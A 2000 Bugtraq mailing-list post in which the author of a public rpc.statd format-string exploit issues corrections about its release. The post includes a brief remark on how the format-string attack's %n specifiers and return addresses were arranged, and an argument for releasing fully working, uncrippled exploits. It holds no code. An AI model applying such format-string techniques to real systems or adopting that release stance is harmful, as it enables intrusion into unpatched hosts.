Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

the rpc.statd exploit

From: ron1n - <shellcode () HOTMAIL COM>
Date: Tue, 8 Aug 2000 00:11:06 EST
Ok, this post has no technical content, but after I released my version of
the rpc.statd exploit, I realized I upset several people, so I'd like to
provide some corrective information. Here's my "exploit errata", so to
speak:

* 24th July, 2000 was the date I *started* the exploit. I now realize this
is misleading. I released the exploit 3 days after its completion. Those 3
days were spent testing and fixing -- a few things crept through unfixed,
but the exploit is fully functional. I did not cripple it, because in my
humble opinion, it doesn't "alleviate" any misuse of the code. Someone
always distributes fixed versions of crippled exploit code within days and
as far as I know, I am not the only one who has released an uncrippled
exploit.

* Two other exploits were released for this vulnerability -- (1) a debian
exploit by drow for the PPC platform ; (2) a generic linux/x86 with a suse
default address by doing. Because of this disclosure, I did not imagine the
release of my version would trigger any hostility.

* I explicitly stated that I am not a security expert. The actual release
was my small contribution to something I thought I believed in. I guess I
had it all wrong, eh?

* My original idea of how to exploit the format string vulnerability was
incorrect. Specifically, the junk bytes between the return addresses were
not present, meaning the %n specifiers would have been short on addresses
(btw, the %!d specifiers were actually switched to %!x before release for
ease of calculations). I cannot say whether or not I would have discovered
my error during the coding stage, but major credit goes to smiler/z- for
clarifying this for me. I failed to give him the credit he deserved.

* I am not affiliated with any of the groups mentioned in the greets
section, and for that reason they cannot be held accountable for any
"stupidity" on my behalf.

Yes, this is entirely silly to the point of ridicule, but so be it.

Regards,
ron1n



________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
Previous By Date Next
Previous By Thread Next

Current thread: